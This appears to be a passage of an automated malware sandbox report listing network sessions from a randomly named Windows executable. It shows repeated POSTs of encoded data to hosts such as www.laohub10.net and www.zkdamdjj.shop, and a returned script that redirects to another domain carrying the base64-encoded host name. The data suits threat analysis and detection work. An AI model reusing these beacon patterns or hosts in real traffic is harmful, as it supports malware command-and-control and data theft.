Jan 11, 2025 02:52:01.372052908 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Jan 2025 01:52:01 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.8	49996	27.124.4.246	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:52:06.887504101 CET	633	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 64 49 78 36 6f 50 76 73 4d 2b 30 43 6c 59 47 50 47 50 54 78 32 4e 6d 46 75 69 6b 75 41 56 71 4b 63 2b 4a 33 31 7a 49 4c 77 35 31 64 6c 64 42 35 73 4d 36 31 47 50 32 4b 38 72 6f 73 38 45 2b 71 2f 69 79 4a 42 66 34 39 33 41 56 45 70 2f 6a 4c 59 53 79 33 36 4f 7a 30 69 61 62 50 4e 5a 46 36 58 2f 77 46 4d 61 53 6f 58 48 33 54 67 32 66 70 6f 78 71 65 71 53 59 47 35 32 4b 39 74 32 2b 78 43 63 48 68 76 67 2b 4c 4e 73 6d 75 46 47 71 43 49 69 6f 54 4f 58 73 31 70 71 51 52 6d 4d 61 70 2b 75 73 45 31 64 4b 70 62 4b 31 79 61 43 77 74 5a 47 30 7a 36 75 61 44 70 78 55 3d Data Ascii: T0JX6z9=+RW/B6W0fKmadIx6oPvsM+0ClYGPGPTx2NmFuikuAVqKc+J31zILw51dldB5sM61GP2K8ros8E+q/iyJBf493AVEp/jLYSy36Oz0iabPNZF6X/wFMaSoXH3Tg2fpoxqeqSYG52K9t2+xCcHhvg+LNsmuFGqCIioTOXs1pqQRmMap+usE1dKpbK1yaCwtZG0z6uaDpxU=
Jan 11, 2025 02:52:07.644983053 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.8	49997	27.124.4.246	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:52:09.428361893 CET	653	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 2b 4b 62 66 35 33 32 78 77 4c 39 5a 31 64 71 39 42 38 69 73 37 33 47 50 79 73 38 75 41 73 38 41 65 71 2f 6e 4f 4a 42 4f 34 2b 30 77 56 47 77 76 6a 4a 63 53 79 33 36 4f 7a 30 69 65 4c 70 4e 64 70 36 55 4f 41 46 4e 37 53 6e 5a 6e 33 55 33 47 66 70 6a 52 71 61 71 53 59 77 35 7a 53 62 74 77 36 78 43 65 66 68 76 31 65 4d 61 38 6d 30 4c 6d 72 67 43 48 59 57 4c 32 34 77 74 49 4d 75 70 39 71 53 2f 59 64 75 76 2f 43 76 59 4b 64 5a 61 42 59 62 63 78 70 62 67 4e 4b 7a 33 6d 41 78 45 6c 79 34 69 6e 69 49 45 41 36 34 43 7a 76 48 57 47 33 6b Data Ascii: T0JX6z9=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBn+Kbf532xwL9Z1dq9B8is73GPys8uAs8Aeq/nOJBO4+0wVGwvjJcSy36Oz0ieLpNdp6UOAFN7SnZn3U3GfpjRqaqSYw5zSbtw6xCefhv1eMa8m0LmrgCHYWL24wtIMup9qS/Yduv/CvYKdZaBYbcxpbgNKz3mAxEly4iniIEA64CzvHWG3k
Jan 11, 2025 02:52:10.185821056 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.8	49998	27.124.4.246	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:52:11.976893902 CET	1670	OUT	POST /36be/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.laohub10.net Origin: http://www.laohub10.net Referer: http://www.laohub10.net/36be/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 2b 52 57 2f 42 36 57 30 66 4b 6d 61 62 6f 68 36 6b 4a 6e 73 5a 4f 30 44 35 6f 47 50 4a 76 53 32 32 4e 36 46 75 6d 56 6c 42 6e 47 4b 62 6f 52 33 31 57 63 4c 38 5a 31 64 6a 64 42 39 69 73 37 32 47 50 4b 6f 38 75 46 62 38 43 6d 71 2b 46 32 4a 51 4d 41 2b 76 67 56 47 74 2f 6a 55 59 53 79 59 36 4f 6a 34 69 61 58 70 4e 64 70 36 55 4e 6f 46 4e 71 53 6e 4a 58 33 54 67 32 66 74 6f 78 71 79 71 53 41 67 35 79 6e 6d 74 6a 79 78 44 2b 50 68 6a 68 2b 4d 46 4d 6d 71 47 47 72 47 43 48 64 47 4c 32 55 57 74 4a 34 45 70 36 47 53 2b 63 38 33 71 74 44 30 62 73 52 59 63 67 59 39 63 32 49 2f 72 73 36 49 36 68 6f 49 43 43 47 30 30 48 47 61 4a 67 7a 73 59 6b 75 57 65 79 57 45 64 43 45 6f 2b 36 58 30 34 42 33 39 6e 75 4e 56 39 33 41 58 76 41 33 55 33 51 43 43 53 74 78 42 59 36 4b 54 56 4b 4d 35 38 31 7a 4c 68 73 38 46 34 42 30 77 73 53 69 66 4d 76 71 6b 67 43 61 67 75 4f 69 68 77 77 42 54 53 48 66 30 4b 35 4a 71 77 61 76 5a 70 59 68 4b 63 6d 79 54 7a 4b 54 57 78 33 4d 51 54 48 6e 4e 6a 49 32 54 42 67 [TRUNCATED] Data Ascii: T0JX6z9=+RW/B6W0fKmaboh6kJnsZO0D5oGPJvS22N6FumVlBnGKboR31WcL8Z1djdB9is72GPKo8uFb8Cmq+F2JQMA+vgVGt/jUYSyY6Oj4iaXpNdp6UNoFNqSnJX3Tg2ftoxqyqSAg5ynmtjyxD+Phjh+MFMmqGGrGCHdGL2UWtJ4Ep6GS+c83qtD0bsRYcgY9c2I/rs6I6hoICCG00HGaJgzsYkuWeyWEdCEo+6X04B39nuNV93AXvA3U3QCCStxBY6KTVKM581zLhs8F4B0wsSifMvqkgCaguOihwwBTSHf0K5JqwavZpYhKcmyTzKTWx3MQTHnNjI2TBg+mk9lg3IAryk6EFMubuvJYay1Ag3fLMuABsYQ4hl8lNQGF7TvjZvkr96kvqSc/h5e1TrjZQwd4FcrA1aLAHMa0fa4nmFfEaDpFariHc6epeSKR+MSWgM8pWyaQN9rRFcaZ0L0/t+8NacAL7h7PIC7mVpKI1zIWgnKZft0qRTbO/fSzB5GVM0U5oRxM5ZLE75Z7k+W+P+tCsQHuxjMkR4CJPT9r8dUYKGDfoGOCsT/3Mbjsns1sunQBWhXkCwATR+O47IdVxutjFpDMMH3fEp80Tb6kN6IpmQmuWDkTknVkZZJkFCP1v3vtfDDZFfUhBQONCMnJF0VD0lmuj4gSGV4xVj/jo9KmxTO5z+f46BEi+sKgsMXyyadvPmeziY87y+yy8NXhbmiGJUIgclyMPSOBeUqxRD2+jDujfBgcBYOSwXSz5lCh+UCcW/tLAdcwAVrrwBlQWTYuq3j0n8WsfPrC1DUGxmzz6dpz9gC7Nd2lUpx7Iqf+9U249C7HOxVqCDBvLYkGyGp1nq3SY4+2CCvkluxf+6fPTQR/dEoT7k95RFYuZ2dOqBMca6oZGUzDvlVSrGgh5VGHv8dtVWX/1fhtiLijWvW2j6b5ModvayGeLxE8YrJorSKDgj+Y1V0XxR4ck8VTd2YoFWpDtEkdwIGC7loptEPSosRK [TRUNCATED]
Jan 11, 2025 02:52:12.760494947 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49999	27.124.4.246	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:52:14.619412899 CET	375	OUT	GET /36be/?Ih6=GzF8v0ph3F&T0JX6z9=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.laohub10.net User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 11, 2025 02:52:15.390369892 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	50000	188.114.96.3	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:52:20.521920919 CET	636	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 208 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 4a 31 63 58 48 65 4e 38 6e 34 79 33 37 51 49 45 50 47 61 42 49 46 48 4c 5a 73 31 35 67 62 67 73 4c 34 74 56 47 5a 4d 30 4c 7a 58 31 48 71 66 70 38 6e 31 66 52 64 52 59 42 4f 7a 39 41 33 4e 44 2f 70 5a 32 6b 30 4a 66 49 53 58 66 63 42 49 71 67 34 5a 74 2b 32 6c 4f 6a 54 6c 4a 4a 4c 77 49 4e 38 63 77 31 33 52 75 73 39 36 51 76 70 2f 7a 35 48 67 42 4b 6a 2b 67 63 36 6a 6f 4f 6e 67 4a 79 63 63 66 61 42 75 43 49 34 53 63 57 43 51 30 36 75 53 36 53 43 55 2f 53 61 65 56 50 73 56 67 74 4a 53 38 64 41 37 35 74 70 6f 38 4a 72 4a 54 48 62 46 57 6c 63 38 54 64 67 3d Data Ascii: T0JX6z9=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6SCU/SaeVPsVgtJS8dA75tpo8JrJTHbFWlc8Tdg=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	50001	188.114.96.3	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:52:23.071086884 CET	656	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 228 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 2f 67 74 75 63 74 57 45 78 4d 33 4c 7a 58 2b 6e 72 30 30 73 6e 69 66 52 5a 6a 59 44 71 7a 39 45 6e 4e 44 2b 5a 5a 78 58 4d 49 65 59 53 56 58 38 42 4f 6b 41 34 5a 74 2b 32 6c 4f 6a 75 4f 4a 4a 54 77 49 5a 41 63 68 6b 33 57 74 73 39 6c 56 76 70 2f 33 35 48 6b 42 4b 69 72 67 64 57 64 6f 4d 76 67 4a 32 4d 63 65 4f 31 74 52 6f 34 51 44 47 44 62 35 4a 72 34 69 53 6d 58 6a 7a 58 39 52 2f 77 31 68 62 34 34 6d 2f 49 39 36 74 42 44 38 4b 44 2f 57 77 47 74 4d 47 4d 4d 4e 4b 32 35 45 67 34 2b 31 70 71 58 73 39 4e 49 58 45 45 51 75 31 41 6c Data Ascii: T0JX6z9=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tBD8KD/WwGtMGMMNK25Eg4+1pqXs9NIXEEQu1Al

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	50002	188.114.96.3	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 02:52:25.616723061 CET	1673	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1244 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 54 30 4a 58 36 7a 39 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 33 67 74 59 51 74 55 6c 78 4d 32 4c 7a 58 33 48 71 54 30 73 6d 67 66 52 67 71 59 44 57 4a 39 43 37 4e 43 63 52 5a 77 6d 4d 49 55 59 53 56 49 73 42 4c 71 67 35 45 74 2b 6e 73 4f 69 43 4f 4a 4a 54 77 49 66 6b 63 68 31 33 57 72 73 39 36 51 76 70 4a 7a 35 48 41 42 4b 37 63 67 64 6a 6d 30 76 58 67 4b 57 63 63 63 39 64 74 4c 6f 34 57 43 47 43 62 35 4f 6a 6a 69 53 71 74 6a 79 53 53 52 39 67 31 73 65 6c 66 39 64 63 6d 6f 62 74 66 30 4c 48 55 66 51 53 30 47 6b 38 48 48 4b 43 6b 45 55 67 47 35 4b 53 55 6c 74 41 55 49 78 63 45 6e 68 74 76 56 53 4a 77 7a 69 6c 36 53 52 36 46 4a 36 78 31 35 66 50 4b 79 34 46 66 66 63 70 4b 36 68 63 62 31 56 75 6f 7a 46 31 49 4a 31 37 72 77 47 6a 2f 4a 2b 32 44 39 39 59 6d 4b 70 32 42 77 64 62 4b 34 47 38 63 47 55 4d 4e 57 46 6a 4a 7a 6f 61 4c 56 50 58 45 4b 6a 2b 53 79 54 56 41 75 59 70 49 79 44 69 71 53 68 30 62 35 47 6c 70 42 37 [TRUNCATED] Data Ascii: T0JX6z9=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9g1self9dcmobtf0LHUfQS0Gk8HHKCkEUgG5KSUltAUIxcEnhtvVSJwzil6SR6FJ6x15fPKy4FffcpK6hcb1VuozF1IJ17rwGj/J+2D99YmKp2BwdbK4G8cGUMNWFjJzoaLVPXEKj+SyTVAuYpIyDiqSh0b5GlpB7VAhDsHO07fivWF0h7d3lPjJst98+w9h/BAcpUEXB18/+05nZaoR1Fy9E1VURXpMw5hkC1AJnuo7nP/0QkcbZFGfH8sKZd+0T48KZFkL81XPE3f63UV3T+SvZJWI/IqM39R++SfHxQLRpS30tW74SkLfXGYLoHvazjRIL14GgSlTuAk4CkDX+z6opO5sjZ0hppXJFqYTDR0KR6m0naYlaRwKawsjtNVg8tjLWHinw1CeWU6rv9aS8OtpAd9HEqn8hrTdElo4NaU45JRSoru3su0TIU92ZsZK5ECRDozWaDnSyYBTD81vaxGqkF+TM6I5Umpoqu56zEXPcKpNbZgIUgbG1P9f7iXWEWIysxSuYzLDqIG3/iDTBsNJbp8kUlHsWeoQ1/zrlrLqjZczPdL8W3hyp9K22oUS5x3j8LlFqso9HRUI0fXmoCrt4AJRmVYXrzaG5+YqcwywG/iwGO+RnaXPXROb33NPUxkWoMLG6iO9XN03k7v1KyJfJhVGQBmMRTQpdHr2Hw+P61TsuC1Gf1b2IM1MmD9zmoHg+NGmIjm+0C+3qf/1Zf9KmG93JcUkVa4jefDIDCbfkQx+aTVW4hfwa8LP5lU3XXlid/DElUYkAH0EJ+z68vTY5EfpkaRbApve2iTPboE9n0CfuYCNHRA6WyLTtj6ajnc [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	50003	188.114.96.3	80	5464	C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe

Timestamp	Bytes transferred	Direction	Data
